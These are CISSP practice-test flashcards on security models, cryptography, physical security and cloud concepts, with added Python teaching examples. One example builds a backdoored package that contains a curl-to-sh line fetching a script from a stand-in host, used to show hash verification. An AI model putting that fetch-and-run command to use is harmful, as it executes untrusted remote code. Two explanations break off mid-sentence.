CISSP Practice Test Chapter 3 Security Architecture and Engineering (Sybex) Flashcards
Matthew is the security administrator for a consulting firm and must enforce access controls that restrict users’ access based upon their previous activity. For example, once a consultant accesses data belonging to Acme Cola, a consulting client, they may no longer access data belonging to any of Acme’s competitors. What security model best fits Matthew’s needs?
A. Clark-Wilson
B. Biba
C. Bell-LaPadula
D. Brewer-Nash
D. Brewer-Nash
Explanation:
The Brewer-Nash model allows access controls to change dynamically based upon a user’s actions. It is often used in environments like Matthew’s to implement a “Chinese wall” between data belonging to different clients.
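The dynamic behaviour described above, as an added example (not code from the Sybex text): a small reference monitor that records each consultant's access history and refuses a read once the subject is already bound to a competitor in the same conflict-of-interest class. The conflict classes, client names, consultants and the `can_write` rule's wording are constructed for this illustration.

```python
"""Brewer-Nash ("Chinese wall") access check: the decision depends on what the
subject has already touched. Added example, not from the Sybex text; the
conflict-of-interest classes, client names and consultants are constructed."""
from collections import defaultdict

# Conflict-of-interest classes (constructed). Clients in the same class compete;
# a consultant may work inside at most one client per class.
CONFLICT_CLASSES = {
    "Acme Cola": "soft drinks",
    "Zenith Cola": "soft drinks",
    "Bolt Bank": "banking",
    "Crown Bank": "banking",
    "Orbit Airlines": "airlines",
}


class ChineseWall:
    """Reference monitor that records each subject's access history."""

    def __init__(self, classes):
        self.classes = classes
        # subject -> {conflict class -> the one client chosen in that class}
        self.history = defaultdict(dict)

    def can_read(self, subject, client):
        """Simple security rule: allowed unless the subject has already read a
        *different* client in the same conflict-of-interest class."""
        chosen = self.history[subject].get(self.classes[client])
        return chosen is None or chosen == client

    def read(self, subject, client):
        """A granted read is what moves the wall: it binds the subject to this
        client for the whole class. Returns True on grant, False on denial."""
        if not self.can_read(subject, client):
            return False
        self.history[subject][self.classes[client]] = client
        return True

    def can_write(self, subject, client):
        """*-property: a subject may write to a client's dataset only if that
        is the sole client whose data the subject has read, so nothing learned
        from another client can leak across the wall through this subject."""
        if not self.can_read(subject, client):
            return False
        return set(self.history[subject].values()) <= {client}


def demo():
    """Matthew's scenario: Acme Cola first, then its competitor."""
    wall = ChineseWall(CONFLICT_CLASSES)
    return [
        wall.read("matthew", "Acme Cola"),       # first client in the class: allowed
        wall.read("matthew", "Zenith Cola"),     # Acme's competitor: denied
        wall.read("matthew", "Acme Cola"),       # same client again: allowed
        wall.read("matthew", "Bolt Bank"),       # unrelated class: allowed
        wall.can_write("matthew", "Acme Cola"),  # has read Bolt Bank too: denied
    ]
```

The write rule is the part exam questions usually skip: without it, a consultant who legitimately reads Acme's data and Bolt Bank's data could copy Acme facts into Bolt Bank's dataset, where a second consultant bound to Zenith Cola and Bolt Bank could read them, defeating the wall without any single subject breaking the read rule.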
Referring to the figure shown here, what is the earliest stage of a fire where it is possible to use detection technology to identify it?
A. Incipient
B. Smoke
C. Flame
D. Heat
A. Incipient
Explanation:
Fires may be detected as early as the incipient stage. During this stage, air ionization takes place, and specialized incipient fire detection systems can identify these changes to provide early warning of a fire.
Ralph is designing a physical security infrastructure for a new computing facility that will remain largely unstaffed. He plans to implement motion detectors in the facility but would also like to include a secondary verification control for physical presence. Which one of the following would best meet his needs?
A. CCTV
B. IPS
C. Turnstiles
D. Faraday cages
A. CCTV
Explanation:
Closed-circuit television (CCTV) systems act as a secondary verification mechanism for physical presence because they allow security officials to view the interior of the facility when a motion alarm sounds to determine the current occupants and their activities.
Harry would like to retrieve a lost encryption key from a database that uses m of n control, with m = 4 and n = 8. What is the minimum number of escrow agents required to retrieve the key?
A. 2
B. 4
C. 8
D. 12
B. 4
Explanation:
In an m of n control system, at least m of n possible escrow agents must collaborate to retrieve an encryption key from the escrow database.
Fran’s company is considering purchasing a web-based email service from a vendor and eliminating its own email server environment as a cost-saving measure. What type of cloud computing environment is Fran’s company considering?
A. SaaS
B. IaaS
C. CaaS
D. PaaS
A. SaaS
Explanation:
This is an example of a vendor offering a fully functional application as a web-based service. Therefore, it fits under the definition of software as a service (SaaS). In infrastructure as a service (IaaS), compute as a service (CaaS), and platform as a service (PaaS) approaches, the customer provides their own software. In this example, the vendor is providing the email software, so none of those choices is appropriate.
Bob is a security administrator with the U.S. federal government and wants to choose a digital signature approach that is an approved part of the federal Digital Signature Standard under FIPS 186-4. Which one of the following encryption algorithms is not an acceptable choice for use in digital signatures?
A. DSA
B. HAVAL
C. RSA
D. ECDSA
B. HAVAL
Explanation:
The Digital Signature Standard (FIPS 186-4) approves three signature algorithms: the Digital Signature Algorithm (DSA); the Rivest, Shamir, Adleman (RSA) algorithm; and the Elliptic Curve DSA (ECDSA) algorithm. HAVAL is a hash function, not a signature or encryption algorithm. Hash functions are used in the signing process (the signature is computed over a hash of the message), but they do not by themselves produce a signature. Note that the successor standard, FIPS 186-5 (2023), adds EdDSA and no longer approves DSA for generating new signatures, so this answer is tied to the 186-4 wording of the question.
Harry would like to access a document owned by Sally and stored on a file server. Applying the subject/object model to this scenario, who or what is the subject of the resource request?
A. Harry
B. Sally
C. Server
D. Document
A. Harry
Explanation:
In the subject/object model of access control, the user or process making the request for a resource is the subject of that request. In this example, Harry is requesting resource access and is, therefore, the subject.
Michael is responsible for forensic investigations and is investigating a medium-severity security incident that involved the defacement of a corporate website. The web server in question ran on a virtualization platform, and the marketing team would like to get the website up and running as quickly as possible. What would be the most reasonable next step for Michael to take?
A. Keep the website offline until the investigation is complete.
B. Take the virtualization platform offline as evidence.
C. Take a snapshot of the compromised system and use that for the investigation.
D. Ignore the incident and focus on quickly restoring the website.
C. Take a snapshot of the compromised system and use that for the investigation.
Explanation:
Michael should conduct his investigation, but there is a pressing business need to bring the website back online. The most reasonable course of action would be to take a snapshot of the compromised system and use the snapshot for the investigation, restoring the website to operation as quickly as possible while using the results of the investigation to improve the security of the site.
Helen is a software engineer and is developing code that she would like to restrict to running within an isolated sandbox for security purposes. What software development technique is Helen using?
A. Bounds
B. Input validation
C. Confinement
D. TCB
C. Confinement
Explanation:
Using a sandbox is an example of confinement, where the system restricts the access of a particular process to limit its ability to affect other processes running on the same system.
What concept describes the degree of confidence that an organization has that its controls satisfy security requirements?
A. Trust
B. Credentialing
C. Verification
D. Assurance
D. Assurance
Explanation:
Assurance is the degree of confidence that an organization has that its security controls are correctly implemented. It must be continually monitored and reverified.
What type of security vulnerability are developers most likely to introduce into code when they seek to facilitate their own access, for testing purposes, to software they developed?
A. Maintenance hook
B. Cross-site scripting
C. SQL injection
D. Buffer overflow
A. Maintenance hook
Explanation:
Maintenance hooks, otherwise known as backdoors, provide developers with easy access to a system, bypassing normal security controls. If not removed prior to finalizing code, they pose a significant security vulnerability if an att
In the figure shown here, Sally is blocked from reading the file due to the Biba integrity model. Sally has a Secret security clearance, and the file has a Confidential classification. What principle of the Biba model is being enforced?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. *-Integrity Property
B. Simple Integrity Property
Explanation:
The Simple Integrity Property ("no read down") states that a subject may not read an object at a lower integrity level than its own. Biba is an integrity model, so the figure's clearance and classification labels stand in for integrity levels; because Sally (Secret) sits above the file (Confidential), she is blocked from reading it, since lower-integrity data could contaminate her higher-integrity work.
Tom is responsible for maintaining the security of systems used to control industrial processes located within a power plant. What term is used to describe these systems?
A. POWER
B. SCADA
C. HAVAL
D. COBOL
B. SCADA
Explanation:
Supervisory control and data acquisition (SCADA) systems are used to control and gather data from industrial processes. They are commonly found in power plants and other industrial environments.
Sonia recently removed an encrypted hard drive from a laptop and moved it to a new device because of a hardware failure. She is having difficulty accessing encrypted content on the drive despite the fact that she knows the user’s password. What hardware security feature is likely causing this problem?
A. TCB
B. TPM
C. NIACAP
D. RSA
B. TPM
Explanation:
A Trusted Platform Module (TPM) is a chip on the motherboard that holds the disk encryption key (or the key that protects it) and releases it only to the platform it was sealed to. When the drive is moved to another computer, that machine's TPM has no such key, so the user's password alone is not enough to unlock the drive; Sonia will typically need the recovery key that was generated when encryption was enabled.
Chris wants to verify that a software package that he downloaded matches the original version. What hashing tool should he use if he believes that technically sophisticated attackers may have replaced the software package with a version containing a backdoor?
A. MD5
B. 3DES
C. SHA1
D. SHA 256
D. SHA 256
Explanation:
Intentional collisions have been created with MD5, and a real-world collision attack against SHA-1 (SHAttered) was announced in early 2017. 3DES is a block cipher, not a hashing tool, leaving SHA-256 (a member of the SHA-2 family) as the only sound choice on this list.
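Chris's check in practice, as an added example (not code from the Sybex text): hash the downloaded bytes in chunks and compare against the digest the vendor published, using a constant-time comparison. The package bytes and the "published" digest are constructed inside the script so it runs offline; the backdoored copy is a one-line append, which a digest still catches.

```python
"""Verify a downloaded package against the vendor's published SHA-256 digest.
Added example, not from the Sybex text; the package bytes and the 'published'
digest are constructed here so the script runs offline."""
import hashlib
import hmac

# Constructed stand-in for the vendor's package and its published SHA-256
# (in real life the digest comes from a signed SHA256SUMS file or the
# vendor's site, not from the mirror that served the package).
PACKAGE = b"#!/bin/sh\necho 'installing tool 1.0'\n"
PUBLISHED_SHA256 = hashlib.sha256(PACKAGE).hexdigest()


def sha256_hex(data: bytes, chunk: int = 1 << 16) -> str:
    """Digest variable-length input in chunks (large files need not be held in
    memory at once); the output is always 64 hex characters."""
    h = hashlib.sha256()
    for i in range(0, len(data), chunk):
        h.update(data[i:i + chunk])
    return h.hexdigest()


def verify_download(data: bytes, expected_hex: str) -> bool:
    """True only on an exact match. compare_digest runs in constant time, so a
    mismatch does not reveal how many leading characters agreed."""
    return hmac.compare_digest(sha256_hex(data), expected_hex.strip().lower())


def demo():
    # Constructed backdoored copy: original bytes plus one appended line.
    trojaned = PACKAGE + b"curl -s http://example.invalid/bd.sh | sh\n"
    return {
        "genuine": verify_download(PACKAGE, PUBLISHED_SHA256),
        "backdoored": verify_download(trojaned, PUBLISHED_SHA256),
        "digest_len": len(sha256_hex(trojaned)),
    }
```

The caveat a practitioner wants: a matching digest proves only that the bytes match the published value. If the attacker who swapped the package can also edit the checksum file on the same server, the check passes, so the digest (or a signature over it) must arrive over a path the attacker does not control.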
For questions 16–19, please refer to the following scenario:
Alice and Bob would like to use an asymmetric cryptosystem to communicate with each other. They are located in different parts of the country but have exchanged encryption keys by using digital certificates signed by a mutually trusted certificate authority.
If Alice wants to send Bob a message that is encrypted for confidentiality, what key does she use to encrypt the message?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
C. Bob’s public key
Explanation:
In an asymmetric cryptosystem, the sender of a message encrypts the message using the recipient’s public key. The recipient may then decrypt that message using their own private key, which only they should possess.
When Bob receives the encrypted message from Alice, what key does he use to decrypt the message’s plaintext content?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
D. Bob’s private key
Explanation:
When Bob receives the message, he uses his own private key to decrypt it. Since he is the only one with his private key, he is the only one who should be able to decrypt it, thus preserving confidentiality.
Which one of the following keys would Bob not possess in this scenario?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
B. Alice’s private key
Explanation:
Each user retains their private key as secret information. In this scenario, Bob would only have access to his own private key and would not have access to the private key of Alice or any other user.
Alice would also like to digitally sign the message that she sends to Bob. What key should she use to create the digital signature?
A. Alice’s public key
B. Alice’s private key
C. Bob’s public key
D. Bob’s private key
B. Alice’s private key
Explanation:
Alice creates the digital signature using her own private key. Then Bob, or any other user, can verify the digital signature using Alice’s public key.
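The four answers above walked through in code, as an added example (not from the Sybex text): encrypt with Bob's public key, decrypt with Bob's private key, sign with Alice's private key, verify with Alice's public key, and Alice's private key never leaves Alice. The arithmetic is textbook RSA on constructed small primes, which shows key roles clearly but is not secure (no padding, tiny modulus); real code uses RSA-OAEP/RSA-PSS or an elliptic-curve scheme from a vetted library.

```python
"""Which key does what in the Alice/Bob exchange, using textbook RSA on small
primes. Added example, not from the Sybex text. Primes, exponent and message
are constructed; unpadded RSA with a ~40-bit modulus is for illustration only."""
import hashlib
from math import gcd


def keygen(p, q, e=65537):
    """Return (public, private) = ((n, e), (n, d)) for primes p and q."""
    n = p * q
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e must be coprime to phi(n)")
    d = pow(e, -1, phi)
    return (n, e), (n, d)


def encrypt(pub, m):
    """Confidentiality: the sender uses the RECIPIENT's public key."""
    n, e = pub
    if not 0 <= m < n:
        raise ValueError("message must be smaller than the modulus")
    return pow(m, e, n)


def decrypt(priv, c):
    """Only the recipient's private key reverses the encryption."""
    n, d = priv
    return pow(c, d, n)


def sign(priv, message: bytes):
    """Signing: the signer uses her OWN private key over a hash of the message."""
    n, d = priv
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(h, d, n)


def verify(pub, message: bytes, sig):
    """Anyone holding the signer's public key can check the signature."""
    n, e = pub
    h = int.from_bytes(hashlib.sha256(message).digest(), "big") % n
    return pow(sig, e, n) == h


def demo():
    """Questions 16-19 in order. Bob holds alice_pub, bob_pub and bob_priv;
    alice_priv exists only on Alice's side."""
    bob_pub, bob_priv = keygen(1000003, 1000033)     # constructed small primes
    alice_pub, alice_priv = keygen(1000037, 1000039)
    message = b"hi9"
    m = int.from_bytes(message, "big")               # 3 bytes, fits under n
    c = encrypt(bob_pub, m)                          # Q16: Bob's public key
    sig = sign(alice_priv, message)                  # Q19: Alice's private key
    return {
        "bob_reads": decrypt(bob_priv, c) == m,      # Q17: Bob's private key
        "bob_verifies": verify(alice_pub, message, sig),
        "tampered_fails": verify(alice_pub, b"hi8", sig),
    }
```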
What name is given to the random value added to a password in an attempt to defeat rainbow table attacks?
A. Hash
B. Salt
C. Extender
D. Rebar
B. Salt
Explanation:
The salt is a random value added to a password before it is hashed by the operating system. The salt is then stored in a password file with the hashed password. This increases the complexity of cryptanalytic attacks by negating the usefulness of attacks that use precomputed hash values, such as rainbow tables.
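What the salt buys in concrete terms, as an added example (not code from the Sybex text): an unsalted digest can be looked up in a precomputed table, while a per-user random salt makes every stored record unique and forces the attacker to redo the work for each one. The tiny "rainbow table" is a constructed dictionary standing in for a real precomputed table, and the record format and iteration count are choices made for this illustration.

```python
"""Why a salt defeats a precomputed table. Added example, not from the Sybex
text; the 'rainbow table' below is a constructed dictionary standing in for a
real precomputed table, and the record format is an illustrative choice."""
import hashlib
import hmac
import os
from typing import Optional

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; tests pass a smaller value


def unsalted_sha256(password: str) -> str:
    """The weak scheme: one fixed digest per password, so a table works."""
    return hashlib.sha256(password.encode()).hexdigest()


# Constructed stand-in for an attacker's precomputed table: digest -> password.
RAINBOW = {unsalted_sha256(p): p
           for p in ["password", "123456", "letmein", "Summer2024!"]}


def crack_unsalted(digest_hex: str) -> Optional[str]:
    """Table lookup: instant if the digest was precomputed."""
    return RAINBOW.get(digest_hex)


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = ITERATIONS) -> str:
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>'. A fresh
    16-byte random salt per password means two users with the same password
    get different records, and a table built in advance matches none of them."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iters, salt_hex, hash_hex = record.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported record format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), hash_hex)


def stored_hash(record: str) -> str:
    """The field an attacker who stole the password file would try to look up."""
    return record.split("$")[3]
```

The salt is stored in the clear next to the hash; its job is uniqueness, not secrecy. The slow, iterated function is a separate defence against brute force once the attacker has the file, which a salt alone does not provide.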
Which one of the following is not an attribute of a hashing algorithm?
A. They require a cryptographic key.
B. They are irreversible.
C. It is very difficult to find two messages with the same hash value.
D. They take variable-length input.
A. They require a cryptographic key.
Explanation:
Hash functions do not include any element of secrecy and, therefore, do not require a cryptographic key. (Keyed constructions such as HMAC exist, but they are message authentication codes built on top of a hash, not the hash function itself.) The other three statements describe standard hash properties: the output cannot be reversed to recover the input, collisions are hard to find, and the input may be of any length.
What type of fire suppression system fills with water after a valve opens when the initial stages of a fire are detected and then requires a sprinkler head heat activation before dispensing water?
A. Wet pipe
B. Dry pipe
C. Deluge
D. Preaction
D. Preaction
Explanation:
A preaction fire suppression system activates in two steps. The pipes fill with water once the early signs of a fire are detected. The system does not dispense water until heat sensors on the sprinkler heads trigger the second phase.
Susan would like to configure IPsec in a manner that provides confidentiality for the content of packets. What component of IPsec provides this capability?
A. AH
B. ESP
C. IKE
D. ISAKMP
B. ESP
Explanation:
The Encapsulating Security Payload (ESP) protocol provides confidentiality and integrity for packet contents. It encrypts the payload and can also authenticate it and protect against replay; what it does not cover is the outer IP header, which is why its authentication is described as limited compared with AH.
Which one of the following cryptographic goals protects against the risks posed when a device is lost or stolen?
A. Nonrepudiation
B. Authentication
C. Integrity
D. Confidentiality
D. Confidentiality
Explanation:
The greatest risk when a device is lost or stolen is that sensitive data contained on the device will fall into the wrong hands. Confidentiality protects against this risk. Nonrepudiation is when the recipient of a message can prove the originator’s identity to a third party. Authentication is a means of proving one’s identity. Integrity demonstrates that information has not been modified since transmission.
Joanna wants to review the status of the industrial control systems her organization uses for building control. What type of systems should she inquire about access to?
A. SCADA
B. DSS
C. BAS
D. ICS-CSS
A. SCADA
Explanation:
Supervisory Control and Data Acquisition systems, or SCADA systems, provide a graphical interface to monitor industrial control systems (ICS). Joanna should ask about access to her organization’s SCADA systems.
In the figure shown here, Harry’s request to write to the data file is blocked. Harry has a Secret security clearance, and the data file has a Confidential classification. What principle of the Bell-LaPadula model blocked this request?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. Discretionary Security Property
C. *-Security Property
Explanation:
The *-Security Property states that an individual may not write to a file at a lower classification level than that of the individual. This is also known as the confinement property.
Florian and Tobias would like to begin communicating using a symmetric cryptosystem, but they have no prearranged secret and are not able to meet in person to exchange keys. What algorithm can they use to securely exchange the secret key?
A. IDEA
B. Diffie-Hellman
C. RSA
D. MD5
B. Diffie-Hellman
Explanation:
The Diffie-Hellman algorithm allows for the secure exchange of symmetric encryption keys over a public network. IDEA and RSA are encryption algorithms. MD5 is a hashing function.
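The exchange described above carried out end to end, as an added example (not code from the Sybex text): each side publishes g^x mod p, combines the other's public value with its own private exponent, and both arrive at the same secret while an eavesdropper sees only the public values. The group here is a constructed toy safe prime so the arithmetic is visible; real deployments use an RFC 3526 or RFC 7919 group, or X25519. The peer-value check is the part practitioners most often omit and most often regret.

```python
"""Diffie-Hellman key agreement between Florian and Tobias over a channel an
attacker can read. Added example, not from the Sybex text. The group is a toy
safe prime p = 2q + 1 constructed for the demo; real code uses RFC 3526
group 14 / RFC 7919 ffdhe2048 or X25519."""
import hashlib
import secrets

P = 1019              # safe prime: (P - 1) / 2 = 509 is also prime
Q = (P - 1) // 2
G = 4                 # generator of the order-q subgroup (4 = 2^2)


def valid_public(y: int) -> bool:
    """Reject 0, 1, p-1 and any value outside the order-q subgroup. Without this
    an active attacker can substitute a small-order element and force the
    shared secret into a handful of guessable values."""
    return 1 < y < P - 1 and pow(y, Q, P) == 1


def keypair():
    """Private exponent x in [2, q-1]; public value g^x mod p."""
    x = secrets.randbelow(Q - 2) + 2
    return x, pow(G, x, P)


def shared_key(my_private: int, peer_public: int) -> bytes:
    """Combine the peer's public value with our private exponent, then derive a
    fixed-size symmetric key. The raw group element z is never used as a key
    directly."""
    if not valid_public(peer_public):
        raise ValueError("invalid peer public value")
    z = pow(peer_public, my_private, P)
    return hashlib.sha256(z.to_bytes((P.bit_length() + 7) // 8, "big")).digest()


def exchange():
    """Florian (a, A) and Tobias (b, B) each send only their public value.
    Returns both derived keys and what the eavesdropper saw: (A, B)."""
    a, A = keypair()
    b, B = keypair()
    florian_key = shared_key(a, B)   # Florian uses Tobias's public value
    tobias_key = shared_key(b, A)    # Tobias uses Florian's public value
    return florian_key, tobias_key, (A, B)
```

Plain Diffie-Hellman gives two parties a shared key but says nothing about who the other party is; without the certificates or signatures mentioned in the question's premise, an active attacker can run two separate exchanges and sit in the middle.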
Carl’s organization recently underwent a user access review. At the conclusion of the review, the auditors noted several cases of privilege creep. What security principle was violated?
A. Fail securely
B. Keep it simple
C. Trust but verify
D. Least privilege
D. Least privilege
Explanation:
The principle of least privilege says that an employee should have only the minimum necessary privileges required to perform their jobs. Privilege creep indicates that an employee has accumulated permissions that they no longer require, indicating a violation of the least privilege principle. The trust but verify principle says that organizations should use auditing to ensure that control objectives are met. The fail securely principle says that security controls should default to a secure state in the event of a control failure. The keep it simple principle says that security controls and other technologies should remain as simple as possible while still completing their objectives.
Matt’s organization recently adopted a zero-trust network architecture. Under this approach, which one of the following criteria would be LEAST appropriate to use when granting a subject access to resources?
A. Password
B. Two-factor authentication
C. IP address
D. Biometric scan
C. IP address
Explanation:
In a zero-trust network architecture, access control decisions should never be made based upon a system’s location on the network. Therefore, an IP address should never be used and would be the least appropriate of these options. While the other options have differing levels of security (two-factor authentication is clearly stronger than a password or biometrics alone), they do not violate the principles of a zero-trust network architecture.
Colin is the chief privacy officer for a non-profit organization and is assisting with the team’s transition to a Privacy by Design approach. Under this approach, which is not one of the Privacy by Design principles that the team should embrace?
A. Proactive, not reactive
B. Privacy as the default setting
C. End-to-end security
D. Defense in depth
D. Defense in depth
Explanation:
While defense in depth is a strong security principle, it is not a component of Privacy by Design. The following are the seven principles of the Privacy by Design model:
1. Proactive, not reactive; preventive, not remedial
2. Privacy as the default setting
3. Privacy embedded into design
4. Full functionality—positive-sum, not zero-sum
5. End-to-end security—full lifecycle protection
6. Visibility and transparency—keep it open
7. Respect for user privacy—keep it user-centric
What cryptographic principle stands behind the idea that cryptographic algorithms should be open to public inspection?
A. Security through obscurity
B. Kerckhoffs’ principle
C. Defense in depth
D. Heisenberg principle
B. Kerckhoffs’ principle
Explanation:
Kerckhoffs’ principle says that a cryptographic system should be secure even if everything about the system, except the key, is public knowledge.
Ryan is developing a physical access plan for his organization’s data center and wants to implement the security control indicated by the arrow in this diagram. What is the name of this control?
A. Mantrap
B. Turnstile
C. Intrusion prevention system
D. Portal
A. Mantrap
Explanation:
Mantraps use two sets of doors to control access to a facility. This may be used to prevent piggybacking by monitoring use of the mantrap to allow only a single individual to enter a facility at a time. They may also be used to allow manual inspection of individuals or perform other security screening. Mantraps are also commonly known as access control vestibules.
Which one of the following does not describe a standard physical security requirement for wiring closets?
A. Place only in areas monitored by security guards.
B. Do not store flammable items in the closet.
C. Use sensors on doors to log entries.
D. Perform regular inspections of the closet.
A. Place only in areas monitored by security guards.
Explanation:
While it would be ideal to have wiring closets in a location where they are monitored by security staff, this is not feasible in most environments. Wiring closets must be distributed geographically in multiple locations across each building used by an organization.
In the figure shown here, Sally is blocked from writing to the data file by the Biba integrity model. Sally has a Secret security clearance, and the file is classified Top Secret. What principle is preventing her from writing to the file?
A. Simple Security Property
B. Simple Integrity Property
C. *-Security Property
D. *-Integrity Property
D. *-Integrity Property
Explanation:
The *-Integrity Property states that a subject cannot modify an object at a higher integrity level than that possessed by the subject.
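The three figure-based questions (Sally reading under Biba, Harry writing under Bell-LaPadula, and Sally writing under Biba) reduce to four comparisons on a lattice, as this added example shows (not code from the Sybex text). The four-level ordering, the subject and object labels, and the convention of reusing clearance names as integrity levels are constructed for the illustration.

```python
"""Bell-LaPadula (confidentiality) and Biba (integrity) rules evaluated by a
small reference monitor. Added example, not from the Sybex text; the lattice
and the subject/object levels are constructed."""
LEVELS = {"Unclassified": 0, "Confidential": 1, "Secret": 2, "Top Secret": 3}


def check(model, op, subject_level, object_level):
    """Return (allowed, rule_name). `model` is 'BLP' or 'Biba'; `op` is 'read'
    or 'write'. The four rules:
      BLP  read : subject >= object   Simple Security Property  (no read up)
      BLP  write: subject <= object   *-Security Property       (no write down)
      Biba read : subject <= object   Simple Integrity Property (no read down)
      Biba write: subject >= object   *-Integrity Property      (no write up)
    BLP keeps high data from flowing down; Biba keeps low-quality data from
    flowing up. The inequalities are mirror images of each other."""
    s, o = LEVELS[subject_level], LEVELS[object_level]
    rules = {
        ("BLP", "read"): (s >= o, "Simple Security Property"),
        ("BLP", "write"): (s <= o, "*-Security Property"),
        ("Biba", "read"): (s <= o, "Simple Integrity Property"),
        ("Biba", "write"): (s >= o, "*-Integrity Property"),
    }
    try:
        return rules[(model, op)]
    except KeyError:
        raise ValueError(f"unknown model/operation {model}/{op}") from None


def blocked_by(model, op, subject_level, object_level):
    """None if the access is allowed, else the name of the rule that blocks it."""
    allowed, rule = check(model, op, subject_level, object_level)
    return None if allowed else rule


def demo():
    """The three figures from the questions."""
    return {
        "sally_biba_read": blocked_by("Biba", "read", "Secret", "Confidential"),
        "harry_blp_write": blocked_by("BLP", "write", "Secret", "Confidential"),
        "sally_biba_write": blocked_by("Biba", "write", "Secret", "Top Secret"),
    }
```

Note that the strict *-properties as coded here allow a write at the subject's own level; real systems add a "trusted subject" exemption for processes that must move data across levels, which is exactly where the interesting audit findings live.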
Lana recently implemented a new process in her organization where managers who are responsible for granting users access to a system are not permitted to participate in access reviews. What principle is she enforcing?
A. Two-person control
B. Least privilege
C. Privilege creep
D. Separation of duties
D. Separation of duties
Explanation:
The separation of duties principle says that no employee should have permission to perform two tasks that, when combined, would pose a security risk. In this situation, an employee auditing their own work would create a conflict of interest, so Lana has implemented a separation of duties. Two-person control is closely related, but it requires that two different employees approve an action. If she required that two managers approve new accounts, that would be an example of two-person control.
Which of the following statements about system development are correct? (Select all that apply.)
A. Systems should be designed to operate in a secure manner if the user performs no other configuration.
B. Systems should be designed to fall back to a secure state if they experience an error.
C. Systems should be designed to incorporate security as a design feature.
D. Systems should be designed in a manner that keeps their functionality as simple as possible.
A. Systems should be designed to operate in a secure manner if the user performs no other configuration.
B. Systems should be designed to fall back to a secure state if they experience an error.
C. Systems should be designed to incorporate security as a design feature.
D. Systems should be designed in a manner that keeps their functionality as simple as possible.
Explanation:
All of these statements are correct. The idea that systems should be designed to operate in a secure manner if the user performs no other configuration is the secure defaults principle. The idea that systems should be designed to fall back to a secure state if they experience an error is the fail securely principle. The idea that systems should be designed to incorporate security as a design feature is the security by design principle. The idea that systems should be designed in a manner that keeps their functionality as simple
Alan is reviewing a system that has been assigned the EAL1 evaluation assurance level under the Common Criteria. What is the degree of assurance that he may have about the system?
A. It has been functionally tested.
B. It has been structurally tested.
C. It has been formally verified, designed, and tested.
D. It has been methodically designed, tested, and reviewed.
A. It has been functionally tested.
Explanation:
EAL1 assurance applies when the system in question has been functionally tested. It is the lowest level of assurance under the Common Criteria.
Jake works for a research organization that is seeking to deploy a grid computing system that will perform cycle scavenging on user workstations to conduct research tasks that require high-performance computing. What is the most significant risk associated with this operation?
A. Data confidentiality
B. Isolation breach
C. Data integrity
D. Data availability
B. Isolation breach
Explanation:
The system can be designed in a manner that protects the confidentiality, integrity, and availability of data. The research workstations included in the grid are from internal users, minimizing the risk of distributing the data. However, an isolation breach in the distributed computing client could be catastrophic, allowing someone who compromises the controller to assume control of every device in the organization.
Eimear’s software development team uses an approach that creates many discrete software objects and then binds them together using APIs. What term best describes this architecture?
A. Microservices
B. Function-as-a-service
C. Containerization
D. Virtualization
A. Microservices
Explanation:
This is an example of a microservices architecture. Each of the component microservices performs a discrete task and then communicates with other microservices using APIs. This might be accomplished using FaaS cloud computing, containerization, and/or virtualization, but there is no indication whether those services are being used in the scenario.
Adam recently configured permissions on an NTFS filesystem to describe the access that different users may have to a file by listing each user individually. What did Adam create?
A. An access control list
B. An access control entry
C. Role-based access control
D. Mandatory access control
A. An access control list
Explanation:
Adam created a list of individual users who may access the file. This is an access control list, which consists of multiple access control entries. It includes the names of users, so it is not role-based, and Adam was able to modify the list, so it is not mandatory access control.
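What an ACL made of individual ACEs looks like when evaluated, as an added example (not code from the Sybex text). It follows the NTFS convention that an explicit Deny entry overrides an Allow and that a request succeeds only when every requested right is granted; it is a simplified model (Windows relies on canonical ACE ordering rather than scanning for a Deny anywhere), and the users, groups, rights and entries are constructed.

```python
"""An access control list built from access control entries, evaluated with
NTFS-like semantics: explicit Deny beats Allow, and all requested rights must
be granted. Added example, not from the Sybex text; users, groups and ACEs
are constructed, and the evaluation is a simplified model of NTFS."""
from dataclasses import dataclass
from enum import Flag, auto


class Right(Flag):
    READ = auto()
    WRITE = auto()
    EXECUTE = auto()


@dataclass(frozen=True)
class ACE:
    """One access control entry: a trustee (user or group), the rights it
    covers, and whether it allows or denies them."""
    trustee: str
    rights: Right
    allow: bool = True


# Constructed group membership (in NTFS this comes from the user's token).
GROUPS = {"alice": {"finance"}, "bob": {"finance", "contractors"}, "carol": set()}

# Constructed ACL on a finance report: contractors may not write, finance
# staff may read and write, carol is listed individually as read-only.
REPORT_ACL = [
    ACE("contractors", Right.WRITE, allow=False),
    ACE("finance", Right.READ | Right.WRITE),
    ACE("carol", Right.READ),
]


def check_access(acl, user, requested):
    """True only if every requested right is allowed and none is denied.
    Entries that name neither the user nor one of the user's groups are skipped."""
    principals = {user} | GROUPS.get(user, set())
    granted = Right(0)
    for ace in acl:
        if ace.trustee not in principals:
            continue
        if not ace.allow and ace.rights & requested:
            return False                    # explicit deny on a requested right
        if ace.allow:
            granted |= ace.rights
    return requested & granted == requested


def demo():
    return {
        "alice_rw": check_access(REPORT_ACL, "alice", Right.READ | Right.WRITE),
        "bob_read": check_access(REPORT_ACL, "bob", Right.READ),
        "bob_write": check_access(REPORT_ACL, "bob", Right.WRITE),   # denied via contractors
        "carol_write": check_access(REPORT_ACL, "carol", Right.WRITE),
        "dave_read": check_access(REPORT_ACL, "dave", Right.READ),   # not listed at all
    }
```

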